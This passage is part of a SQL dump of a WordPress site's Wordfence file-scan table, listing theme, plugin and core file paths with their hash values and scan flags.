(0x0d518a8e340374c0391de9ac96eef751, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-woo-commerce.svg', 0, 0x8a1354d2a97d970a2b88b8b207a75170, 0x8a1354d2a97d970a2b88b8b207a75170, 0x3a9bcd331daa3a3534749b4bdf8ef135855e94ff7028b142f072b73877f0a4a3, '', 0, '?'),
(0x0d77d73026fcd25a006045818bf9da97, 'wp-content/themes/Impreza/framework/shortcodes/us_counter.php', 0, 0xde7b868ca5b124716dcc146850a9256e, 0xde7b868ca5b124716dcc146850a9256e, 0x0a545392ffacf753fb4f7a3ddf5855888d3d38320f425a40ee31358bb8a36fed, '', 0, '?'),
(0x0d78dd8d815eb4a7bf1aa08302bd3c3b, 'wp-admin/my-sites.php', 1, 0x00000000000000000000000000000000, 0x183db07382d68d97f91221311e6111aa, 0x0576e4032e5c82fd86e534c272a2daf6a48a4ec3f42c17a2da50b179665556e1, '', 0, '?'),
(0x0d7ac7100f1d8dbeb18a44d644eb9ed3, 'wp-content/plugins/wordfence/views/options/option-toggled-sub.php', 1, 0x00000000000000000000000000000000, 0xb2941a28e1617c011cbfb9d9ce915d78, 0xcd8fccbdb1cb55b824c971399319b59c65671af872116e5f61ab8c480343ffc8, '', 0, '?'),
(0x0d7cdb88048a2d0743940b09a6af5b50, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg', 0, 0xb284e41b04966f71c28d919f91eda0ed, 0xb284e41b04966f71c28d919f91eda0ed, 0xa68a2d574bb341f8e24b7c0d09167642409d18d3e64303062b20909fd0141cb9, '', 0, '?'),
(0x0d80e7fee0cb58b0f6c0ad2bc32d5461, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php', 1, 0x00000000000000000000000000000000, 0x20bcd3d3d94f3e41dc2be43d041a172c, 0xebe555e273ecddcec2448e4dc399c60c64cdc08028cf0083b1c481a67ecdccc7, '', 0, '?'),
(0x0d83764ef516cc5b42e1d326ead8534c, 'wp-admin/css/common.min.css', 1, 0x00000000000000000000000000000000, 0xad5ad5176f246f2c063e6b17b204f6fa, 0x91b1e5ea42b6ead846ccd40da7ddf3a7b407cceda45bbe181f7890b7b6e55227, '', 0, '?'),
(0x0d88e4eaeb6ff78f4d01f03ad258dc6b, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg', 0, 0x1631b401a1b906f2de438c08bca7c5c9, 0x1631b401a1b906f2de438c08bca7c5c9, 0x8fbce25610e2ddd4f5c62b05f5fb6228ecc1a7b038824c25aeec0891c96d0a49, '', 0, '?'),
(0x0d98d2a7784f7ae4e286f77a8290be68, 'wp-includes/class-wp-customize-panel.php', 1, 0x00000000000000000000000000000000, 0xfdecdea3f6aa441f448a9379c2e8f2b5, 0x6e79190a0d0f0c1907ca98496b666f6fa94a570cdd1842270c1e875f0ff8fab2, '', 0, '?'),
(0x0d9c8d3a893a8910ec1df54848f93a64, 'wp-admin/css/edit.css', 1, 0x00000000000000000000000000000000, 0x0b4b9fa4c732d440c63e7a7c292c67e5, 0x3631c32adbbdea1b930d446dd9cf07e263b19afcdb64d0973929477d9c1759cf, '', 0, '?'),
(0x0dadee5812cadd6cb41511ea5e082343, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg', 0, 0xe21c6b9d92bc28313aaada62f2636bcb, 0xe21c6b9d92bc28313aaada62f2636bcb, 0x9485d2da2add0f74e89baa050c746df3b453490c6f320df47c6f8adbb211326b, '', 0, '?'),
(0x0daec25e9988562f1a803728cc5a0ae1, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/xml-hint.js', 0, 0xa0561c068a9ed936aead92563a911d6d, 0xa0561c068a9ed936aead92563a911d6d, 0x91e89ccaab060fbc3c671e9d1166d4622af07fc7825cdf8315440314f5aa2ca0, '', 0, '?'),
(0x0db72f5165f177159c84b58dfbc9451c, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-puzzle.svg', 0, 0x2563c8a54194562ce579f6eb99d96c5b, 0x2563c8a54194562ce579f6eb99d96c5b, 0x7a74e4645a07d7a42203c3b1733ec1caf0b4b46dec9af171ca13bd452ce19611, '', 0, '?'),
(0x0dc32514db11e1e3cf25bc7953fd60f0, 'wp-includes/js/crop/cropper.js', 1, 0x00000000000000000000000000000000, 0x1d97b296d918482e1273c56fbff6a8e2, 0x03bb7079d6ebdbd02c42b7f9f2faccd047cfd4f62dc9749ce90eabdcd63de173, '', 0, '?'),
(0x0dd1aa10311c73313daca16006289879, 'wp-admin/options-head.php', 1, 0x00000000000000000000000000000000, 0xdd6356384123683a65d7ad2ff20bbf5e, 0x63d28884ee1f5e246b52320d3d9dbd8ddcabf002fed8f94067b8ca7f32e7fa1c, '', 0, '?'),
(0x0dd297e872d7be8820c103b9ce0a9c1a, 'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php', 1, 0x00000000000000000000000000000000, 0x158821509f79897438ed84ba50367187, 0xf56b775129b8f927b0e54a7efe4d8545730872b48558ea595fe5e3c0b8476621, '', 0, '?'),
(0x0df8e8bd665f5c6938e188be32c817b5, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-misc.svg', 0, 0xd344ba5b60a68cea26b6b3b2d3063fd4, 0xd344ba5b60a68cea26b6b3b2d3063fd4, 0xdb646d99b1420e660c218d600b4b6bded3af9df6ae5c4448d77fbc743509c933, '', 0, '?'),
(0x0e018598144e1a33e4d9fce86f8f5b90, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg', 0, 0x0c61a10db119936157575d2f724a63e3, 0x0c61a10db119936157575d2f724a63e3, 0x370a06cbb78d399cc51e141fd83838bd1e1c3e3719f96368f83577d659218725, '', 0, '?'),
(0x0e02806d1b93e73849e606e979638df9, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_24px.svg', 0, 0x30a5e7b31c7ddef68f1d7d95207782f1, 0x30a5e7b31c7ddef68f1d7d95207782f1, 0x040fede2ebe5b991a9e5a7a5913677185801ccf6104b5d493bb70578f69a34a2, '', 0, '?'),
(0x0e0533b4ddfde20602639735f4e4889f, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php', 0, 0xbd9aa630d82d07293a6b5fa24a9958fc, 0xbd9aa630d82d07293a6b5fa24a9958fc, 0xba9a18f82f6beaacc7f3260dc9a0b00e03ef9f3d2d45f9184128f97adefc3ed2, '', 0, '?'),
(0x0e117c7626d01e1df14920bafedc8b66, 'wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php', 0, 0x950e70475d8e8f3ccfd5efc0d4172f1e, 0x950e70475d8e8f3ccfd5efc0d4172f1e, 0xd3f0477efa9c614f77e2f376d393a84a9025280fad38f7d2517280a2ab6cf79e, '', 0, '?'),
(0x0e205330307f641e7c64555b678eae07, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg', 0, 0xbd418a5c7aa623c504d830c70319c7a8, 0xbd418a5c7aa623c504d830c70319c7a8, 0x95b0e4871b82769e58c42ae580fdfa9f9122c14b7519113fbdc88a21b643f8a9, '', 0, '?'),
(0x0e2dce5dd5e6307f99184613249910c3, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_no_encryption_24px.svg', 0, 0x7cb908b029646ab74f7e8c6c1d095aa5, 0x7cb908b029646ab74f7e8c6c1d095aa5, 0x22c580f78349713679a365531d5b7a3c00ba5633f9c2b7596e207e4240babed1, '', 0, '?'),
(0x0e34d42e1ca715a4e7461f578fa93cfb, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-simplexml.php', 0, 0x9222f0da65d717b807045e3090f6dbd2, 0x9222f0da65d717b807045e3090f6dbd2, 0x715395afcda56ac8b56aceb2dea46b8bddd692a1d25b8a54105ef6ee4176d2da, '', 0, '?'),
(0x0e42c96c40ea21c6321cf18cd38a83a5, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg', 0, 0x86808e98a1c7195c48aaa3b990dfc891, 0x86808e98a1c7195c48aaa3b990dfc891, 0x9cb6865795aed642fe5ca10414d08015e2393963c7c345de45fcb0d47f5a95e3, '', 0, '?'),
(0x0e4ecb4f08c8f4ded014c8a011e7d706, 'wp-content/plugins/wordfence/css/wf-roboto-font.1579191227.css', 1, 0x00000000000000000000000000000000, 0xb8c15dd5ef0c0bf0184f0f8c75ddb59c, 0xf48a2bc5684a7e08bfca86b4aa2ae9ec612a14a0fd0fe247623637a70da93ab1, '', 0, '?'),
(0x0e5382056b5130f376cca768eb581e20, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg', 0, 0xef716205b06c0316d8e126abafb16c7a, 0xef716205b06c0316d8e126abafb16c7a, 0x596b937d2575703666e90f5fdea78934e69fc7730f4c23a97835d85f1c2748ca, '', 0, '?'),
(0x0e5737a4947b2884a63b3a50a59a9d3f, 'wp-admin/includes/class-bulk-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0x4132e73fec01d610ac9a9ad82b5994b0, 0xf369b7cbc09d3bf64d33058e55c850f10e17113cebc0585ad30ea17adac4dfe2, '', 0, '?'),
(0x0e58ffe648e5a5a528bb3ac85aeda914, 'wp-admin/admin-ajax.php', 1, 0x00000000000000000000000000000000, 0x286cb8d64a83d1408de35442b6fa3efd, 0x67a9b9b09eb64a86fa656cb12373dfcd814aeb4e30a2f5e5948181a67699266b, '', 0, '?'),
(0x0e6135c2cd8542885ff3ad120b8173ce, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php', 1, 0x00000000000000000000000000000000, 0x8645d3a4e3ad87e7cf4d88a46717aab4, 0x51d8f8a32a27b684fe42a92b1445061781fcdf9eb3fb3a95f36d8cce7975d657, '', 0, '?'),
(0x0e676fac739c56e3a33bedc7ff850a24, 'wp-includes/js/tinymce/plugins/compat3x/plugin.js', 1, 0x00000000000000000000000000000000, 0x2bdb6ec1c3d931d9ecbb169fcf6f5662, 0x4318c084f9541299289be74e2b952c8fb4544ee843c0f781cc60dea98a82ecbf, '', 0, '?'),
(0x0e7a71082203054b4ed37325a5269117, 'wp-content/plugins/revslider/admin/assets/imports/search-form-hero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x0e7d446978481043037a5e54ff005998, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_36px.svg', 0, 0xf831e593430fd929ec24f95baff57bae, 0xf831e593430fd929ec24f95baff57bae, 0x757907ceb6d160c69476dcb81a59f364050c55c6d0069eb95426cd131ae966a6, '', 0, '?'),
(0x0e9568af721aa897aaba3b2565982d78, 'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png', 1, 0x00000000000000000000000000000000, 0xd80747d34afb87753b51d45a36f8bd17, 0xfffb8506df5c4d55198ced4b6851af77c043a903b669d656b4eea2b9b2ce4a27, '', 0, '?'),
(0x0e98532e306edc6483965b6b29a8665f, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_0.php', 0, 0xc5d1e642f950b625e2503d66c13672b8, 0xc5d1e642f950b625e2503d66c13672b8, 0x48ab552ae0b2cd6643e91a357ce3499e13118340ad90642ad07a09a0dab69804, '', 0, '?'),
(0x0ebd04b64a41c3a402c82379c2cf16f8, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php', 0, 0xc41c55dbc2358b949f494aa810cc8bae, 0xc41c55dbc2358b949f494aa810cc8bae, 0xd1ba42899394a9facfd3d2acd5b7c3c6104172ecec814e9d4ad6415724518170, '', 0, '?'),
(0x0ebd57574b77c470e040a260dc83d59e, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg', 0, 0xf79c4b74b7e60a135b02d2d4647d795f, 0xf79c4b74b7e60a135b02d2d4647d795f, 0x05b4de5e844afd753ceb382a7a3e61e30abd2a9b2a85d42ee8d05803108be689, '', 0, '?'),
(0x0ecc200e87eca10c4311aa5907968ef1, 'wp-includes/pomo/entry.php', 1, 0x00000000000000000000000000000000, 0x43eb8e65e3456f93cdbf61d6bb42545f, 0x1bca65a65d8f905478ff12a53d32ccde3b9a7af2192f662705a2a3c2eadba3ad, '', 0, '?'),
(0x0ecd3e12ff4dd20538b820d9b5add17c, 'wp-includes/images/crystal/archive.png', 1, 0x00000000000000000000000000000000, 0x9653ca07faf08e9ccc493041020e6eeb, 0x4c83d6251458b0f304a3d04fe82bc4de4161ae210fd753c15cdc89f42697a8ae, '', 0, '?'),
(0x0eebe503220d4a00341eb011b92769b4, 'wp-admin/js/password-strength-meter.js', 1, 0x00000000000000000000000000000000, 0xe95f7bfdde679787ce1dfa9ec54ea0fc, 0x30108f7f53b8258ebbe128352c6a59a6ec98ea6d16a29e7c787f6c5e00afaab7, '', 0, '?'),
(0x0f1320c6b571c232faf78f1b36341d9a, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg', 0, 0xdf8e585d0b04728d15a3c415337d5b6b, 0xdf8e585d0b04728d15a3c415337d5b6b, 0x9bb1b1668b58c30ae7d127c8d324a297d0559f614206e99a700d53660dd152c7, '', 0, '?'),
(0x0f1e62cec3808773128982289e4d83d3, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.mo', 1, 0x00000000000000000000000000000000, 0x59f7eb91fbb47682c7da15acc7522dac, 0x07229c7b96b3c3028c734f1c088851de8a3e370915ec48b7e420141de968f6e2, '', 0, '?'),
(0x0f3df9154dc0dc22ccfcfbbd5ead3a0b, 'wp-content/plugins/revslider/admin/assets/imports/classic-carousel/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x0f3e24f1c92486e8f067699eb684905e, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg', 0, 0xc5ece6a1249d902b5b35bdf1953044da, 0xc5ece6a1249d902b5b35bdf1953044da, 0x0df37e0509cf86d70f0406c265ce0866e695cea0cca7644ca4c4240f0e11b882, '', 0, '?'),
(0x0f44227d95ec581356c99540096a931a, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-date.svg', 0, 0x08faa7ba661387804033c4464bf0b19b, 0x08faa7ba661387804033c4464bf0b19b, 0x76983b957d21ae584b1efd476ddb67667057b5f4acb486a0d64bbac60ced83a4, '', 0, '?'),
(0x0f4d7d1147e17167a57a281f15f3e359, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php', 0, 0xd7dbe91ca0ac101b9fcd1f950f89cdf3, 0xd7dbe91ca0ac101b9fcd1f950f89cdf3, 0x2823de9ff1cf8f3360c3f6d7b812cd77f1a96758d73fd699e45cfd7738545bf2, '', 0, '?'),
(0x0f5167a68f455794f780a36f3fe685bb, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/range-slider-touch-punch.js', 0, 0xf7c7fcb3737096cc4a3f3bb4bdc1a15b, 0xf7c7fcb3737096cc4a3f3bb4bdc1a15b, 0x24cbb054a095b4dd0c0f1417d757d589fa7b25284cbcb5b182d8cebfe882f535, '', 0, '?'),
(0x0f572944528509fdd6d6039b19d878e7, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php', 0, 0xe2842d8ef4f3f2015d6b299b328ae919, 0xe2842d8ef4f3f2015d6b299b328ae919, 0x1490eb2d4dc6ca7762153f549d9a4bbae882b2ff3ecd8466d39390b629ccdc83, '', 0, '?'),
(0x0f5cdc07e0e3941db7f041562ae7b1bf, 'wp-includes/js/jquery/ui/slider.min.js', 1, 0x00000000000000000000000000000000, 0x6c55f2f9a18a80fbf2b3a59dd9e8c7f3, 0xcc328d98133fc18deedbe54c2be4a2701240379287bcf5b658ab35b8c7458b99, '', 0, '?'),
(0x0f728dca715edfefb593dc896344c042, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/runmode.js', 0, 0x5c5eb7d1f7b0193315b0128077e7c5e7, 0x5c5eb7d1f7b0193315b0128077e7c5e7, 0xb85addfe76326c48e90dc6e97dedee2e142c1ce5de649fa635743bc12a6f4e1b, '', 0, '?'),
(0x0f81b624c04e4a668861e4497797a543, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg', 0, 0x57d2d43f43befffe05debc07a06c6ed2, 0x57d2d43f43befffe05debc07a06c6ed2, 0x29947499391f4c59010a912c410da5f9cd45e9c5d8844072f7912208594f3393, '', 0, '?'),
(0x0f827735a10aa872810952d66aa39953, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_accordion.php', 0, 0x5b3c23f1345875d734fd7370b63fadad, 0x5b3c23f1345875d734fd7370b63fadad, 0x7fa11a07564e37e6ca688f30fc48d64798c93072ca59a8ccf1d78457bfd0b865, '', 0, '?'),
(0x0f89414973b9e8949860159c7913e1af, 'wp-content/themes/Impreza/framework/templates/elements/post_taxonomy.php', 0, 0x452423d1e4637b0be337c7e8cdfcf031, 0x452423d1e4637b0be337c7e8cdfcf031, 0xd86e6fcfc2855cee7b20be0ce63d39ebedd2ab6aa5aa88f37782dd60ae192b5a, '', 0, '?'),
(0x0f89d7748ba7a0a7dc589d0d216bdbc2, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/slick-custom.js', 0, 0x0e1252cf0288933b9a4d9c04ed64a6ab, 0x0e1252cf0288933b9a4d9c04ed64a6ab, 0x8117dc292eed7c26ab72f0b5a646943b62b4f4060ce13c62db9a3365b7ab4ef9, '', 0, '?'),
(0x0f9563addb6e78c017d4ba7c061003c8, 'wp-includes/class-walker-category.php', 1, 0x00000000000000000000000000000000, 0xf8480c4b969f278d448f18f927e0580b, 0xe6d7b9baec39e56c0726f2412aad0c948a0eab2eda9b417d101ed136e854bb5a, '', 0, '?'),
(0x0fa8b7334eb962df9c02527d00bbada5, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg', 0, 0x137fcbcce3b91539196f076af92b77d0, 0x137fcbcce3b91539196f076af92b77d0, 0x13e4bf0bd919c2d3d962f715e0380d0298f1f607f7c05e2cd0cb75abff739eba, '', 0, '?'),
(0x0fbd0482e088ab1881aa6e8cb2034e64, 'wp-includes/js/hoverintent-js.min.js', 1, 0x00000000000000000000000000000000, 0x492aa1f2633a89704f676a97e9a13a74, 0xeb74f55f25afbb1a30b189ea706b27aee068218110beba37c2c331d34133b7b6, '', 0, '?'),
(0x0fc15daf2a0ec12e0f3e6045f59366b1, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php', 1, 0x00000000000000000000000000000000, 0x6bd346a3a0c60c68a2e780810e312da6, 0x361f216f8a6df6a6dd8e5e8e172ec15e40cba8d10fd27637f10949e19c7d809f, '', 0, '?'),
(0x0fc242b31a7a5d003a6f2271a7d0c1d2, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_8.php', 0, 0x7df04e2ff42544562155651cd7e61d0e, 0x7df04e2ff42544562155651cd7e61d0e, 0x86a6b59daa4e5eaddba5299f5757e9e74fa39981c41c798caeb5808014403970, '', 0, '?'),
(0x0fc7dda13dbdbd4e7817bc874bd4602a, 'wp-content/plugins/wordfence/lib/wordfenceClass.php', 1, 0x00000000000000000000000000000000, 0x32529898ddfa8a8cd98d624f69fcd09a, 0x22d59ee8ff1ec06d595db12925cd2d5fa0f025c834e419cf95ce609f48d5a9cc, '', 0, '?'),
(0x0fdb67d9240c8853a8ed35c380bf539b, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg', 0, 0x1ab34b392803030df33c07f3e56e2d12, 0x1ab34b392803030df33c07f3e56e2d12, 0x8086005b6aeca0f4239bc8923b72d976f10577ff2126788a0cb5482bf4649197, '', 0, '?'),
(0x0fdf789fc7e3e2636b8d8dc3d54bb7f6, 'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1579191227.css', 1, 0x00000000000000000000000000000000, 0x23f52fcc08b1683cc01b9e55d5f514a4, 0x9f6ee4e8f8c1e0690c9dd9eb9785b54eb5765816a537ab595db48590bcb01944, '', 0, '?'),
(0x0fe39f477984c4b0abed69166beaedaa, 'wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php', 0, 0xc83301423eda77b766bb6cb7dea184c3, 0xc83301423eda77b766bb6cb7dea184c3, 0xcd89442cff81d5fb609e28544f9e1cbb3944566d880b56fe5f58b20cc291f864, '', 0, '?'),
(0x0feaf264b8be3de1c3406873b03a6b7d, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php', 1, 0x00000000000000000000000000000000, 0x4b236c4a50a88b6530759f67a5db9481, 0x55fe574d9a99eadb736c4c9edce6d51739235462a01657186a3f5cd175a5bfb9, '', 0, '?'),
(0x0feda44f754181621b562a4a57bc890e, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/modal-all.min.js', 0, 0x1863ae249a4ca37dcbfa99f2d5b41ce1, 0x1863ae249a4ca37dcbfa99f2d5b41ce1, 0xb0f5442d9e97f4691d6d37ff67b45e75577b7a8242b1b66fe7f772783df81e4b, '', 0, '?'),
(0x0fee8807724aff3c703ea7fac3c45a96, 'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php', 1, 0x00000000000000000000000000000000, 0x3988c2a10ef8cee35e2d2ce68eaa4567, 0xaa5830bd930dc6f9a9107666c5ade2f9052d24b05aef75de59a25320c8d6c097, '', 0, '?'),
(0x0ff5262f18a26462a464c87111b0322f, 'wp-admin/includes/class-wp-community-events.php', 1, 0x00000000000000000000000000000000, 0xb2543ba111349bacf0c7e717fe0a367d, 0x5e1ca3bb979f6e5b31530f408a6a1703885017ee94fb92225d247ff78fcefb36, '', 0, '?'),
(0x0ff61e257734103510f85882dfe6b39e, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php', 1, 0x00000000000000000000000000000000, 0x74b8b00f5e4927dc5d21afb2d206b3f1, 0xf01585c7a6d66274cb1b35a18b6681b7fa18aac5f8060f63d21ebf6b64febc6d, '', 0, '?'),
(0x1000f5aa5dc061f076950494be435901, 'wp-includes/class-wp-walker.php', 1, 0x00000000000000000000000000000000, 0x2a2be973311afa61e4bcfec45c8b4879, 0x7898aa84ab7324331cd7958bce34775475621f2f04b4e4d69438a49e7914d256, '', 0, '?'),
(0x10021db0d708dca1e2062b14f0eb374b, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js_composer.php', 0, 0xc59e9089cd93bcf578ae24bcdaf3fb56, 0xc59e9089cd93bcf578ae24bcdaf3fb56, 0xfad767c29aaf99468d9963161491ab704006be76a1a476335d89f4909834158c, '', 0, '?'),
(0x1005ab3f4893a9ffc4eb9768ac443009, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php', 1, 0x00000000000000000000000000000000, 0xc65e525b5849a1a054b40c6529b4cfc0, 0x758139d6203ae8175917126ef0553a739b79036735303d9e094357352465413d, '', 0, '?'),
(0x100693a2fe4e56d4b1b30be6887ac35a, 'wp-includes/js/jquery/ui/effect-shake.min.js', 1, 0x00000000000000000000000000000000, 0x52adac7c5413612aa59472d00bcd0b5c, 0xf946900847613fa94d6f1d82cc8417c00ca3113e6c229f3427506cb25d44b821, '', 0, '?'),
(0x100a29b908a42013f19dcf6295179d2c, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_grid.php', 0, 0xcb6b484ade34b0b04ee3e025e10e95d2, 0xcb6b484ade34b0b04ee3e025e10e95d2, 0xc824467b645176f42f57ca41e765e8a82ccc56aec7252f197d835d4041b248f2, '', 0, '?'),
(0x101bd88215eb793d037f131c4ac36fac, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/typed.js', 0, 0x9e81d6013deb56b38982b0c1d0bb0c4d, 0x9e81d6013deb56b38982b0c1d0bb0c4d, 0xd736ad55212228f6fc5a919e5e64c274ca84f038594215985e1a855b323b709e, '', 0, '?'),
(0x10298f9f0c5fe6f6924aaf87d71d99d4, 'wp-includes/js/media-models.js', 1, 0x00000000000000000000000000000000, 0x5541276bc1d1608b07691b3f8c487c89, 0xc9267c3191c4c52c62049f0b9c1ebfecd42b81f0bdb0d3f1c35ce999cdbf1981, '', 0, '?'),
(0x104627d185492bb360d7f64135fad9ed, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg', 0, 0x76271a35e2e44b24ccdd72edfb2e6d55, 0x76271a35e2e44b24ccdd72edfb2e6d55, 0x1ed422956015b466a4d328ae6d45d22aeb9050e3532b493e4d1c8e48e99d7244, '', 0, '?'),
(0x1046ea3f2c03e790dac565b23439b237, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.migration.min.js', 0, 0xd7d15c9a54405a6197b7312617a077a6, 0xd7d15c9a54405a6197b7312617a077a6, 0xd40e6a4a40726ea6be4045066f4e3cdb81c322234b10601dce0eb8a1ff40134c, '', 0, '?'),
(0x10473c37650b8374aa2fee928ff757a4, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php', 1, 0x00000000000000000000000000000000, 0x5b6630194c94c59fbbd20db37b5657e8, 0x8b1dd02726dc94155b6d60c4cf8ad0633245bac7fb25e45715bf4757bae489b7, '', 0, '?'),
(0x105bc3d657ddd0343459aee228ff28df, 'wp-content/themes/Impreza/framework/functions/header.php', 0, 0x4e946f3605e1fac9684707c1db2482f2, 0x4e946f3605e1fac9684707c1db2482f2, 0xbd8a57ba6612b059697c775c3a32fcb8594e6f1db77efc0d78ed4539364f3fd4, '', 0, '?'),
(0x1060990126adb8e994a57e4b33052f64, 'wp-admin/css/login.min.css', 1, 0x00000000000000000000000000000000, 0xb0716f9ea0eb89a8037d01d61819d295, 0x2a18e6c207f718b58e2a647a6dcc871be567d77476e7d70bbe3844f526960ed7, '', 0, '?'),
(0x1060de3c263ec6b9a9a6f41d6b5c803a, 'wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg', 0, 0x107d077d609efa7239165672c26a3c8b, 0x107d077d609efa7239165672c26a3c8b, 0xcdadd1cad58a7ddc796e094f7dddcf741856d1287d69eb7186cc3dbb05304e86, '', 0, '?'),
(0x106bbff30d9efc48f552fa2197e94e28, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg', 0, 0x20a89e4eb80d5331b92aef5e4dc34fbe, 0x20a89e4eb80d5331b92aef5e4dc34fbe, 0x3b9b8fd0b5541a0062e1fa141b33b57855a9dee5ed8bca8fa7404dbc804ff1b9, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x1081280f7a1ba7bb8a3e1aa5ca6d0287, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg', 0, 0x7085356c5fd934553c839382bb090f3e, 0x7085356c5fd934553c839382bb090f3e, 0x242d76d5cc17c4a3002d6e14f5f29e9f1a639ec49ed416dfa1af54f8130d8755, '', 0, '?'),
(0x1084aacbe023b4fb8b2ee52aaed26f1d, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_left_24px.svg', 0, 0xa743c2b271942bb87ca9d62e03b776a2, 0xa743c2b271942bb87ca9d62e03b776a2, 0x5c5d68af9dd13b5f7385556874193a0ddb3035178e415567fdbacebb7a68a131, '', 0, '?'),
(0x1090b89cd2912de8ccf48a0d8a7b2cef, 'wp-content/plugins/wordfence/lib/wfCache.php', 1, 0x00000000000000000000000000000000, 0x3720c6bf9ec47f94c473ee7989df0f16, 0x7ced751b4950f5776835da8e0f2e6d222a6e5ffbac2039cc1198adbc4af050ce, '', 0, '?'),
(0x1093167e98e24cc9ce2ac42cc43c3aa5, 'wp-admin/includes/theme-install.php', 1, 0x00000000000000000000000000000000, 0x345feff5b187d508b2619f802608ffd4, 0x8e8b2b233e3dc15db04c3800c2ac64d3687b72435b4347c3c13d5ac1b3501815, '', 0, '?'),
(0x10a6908e42fb06d93ab8cdce27a872dc, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/dialog.js', 0, 0x1883f8872dfd4f75f08c17d055f32134, 0x1883f8872dfd4f75f08c17d055f32134, 0x45f0d99229cc814741b1f9b0cae7af5deb228ba3f49cdca23ecc1663600e09f3, '', 0, '?'),
(0x10ae53781ec3df34ae406fc177ef0e4e, 'wp-admin/js/widgets.min.js', 1, 0x00000000000000000000000000000000, 0x95405e5d6077252bee8a3e9e84d10580, 0xada52c0612ee86a785a1142cfccb6e04e67aaecae8b9a5f2454b70ddacb39c38, '', 0, '?'),
(0x10b70689884b05958a136f520bb3c47d, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php', 0, 0x8d9ea3c424fb2d2b2c31bc6c19b77e45, 0x8d9ea3c424fb2d2b2c31bc6c19b77e45, 0xcdb433b9c5493d9df1bbe91f9dbfdfa41d70f74ee636b7c733adff139befd6dd, '', 0, '?'),
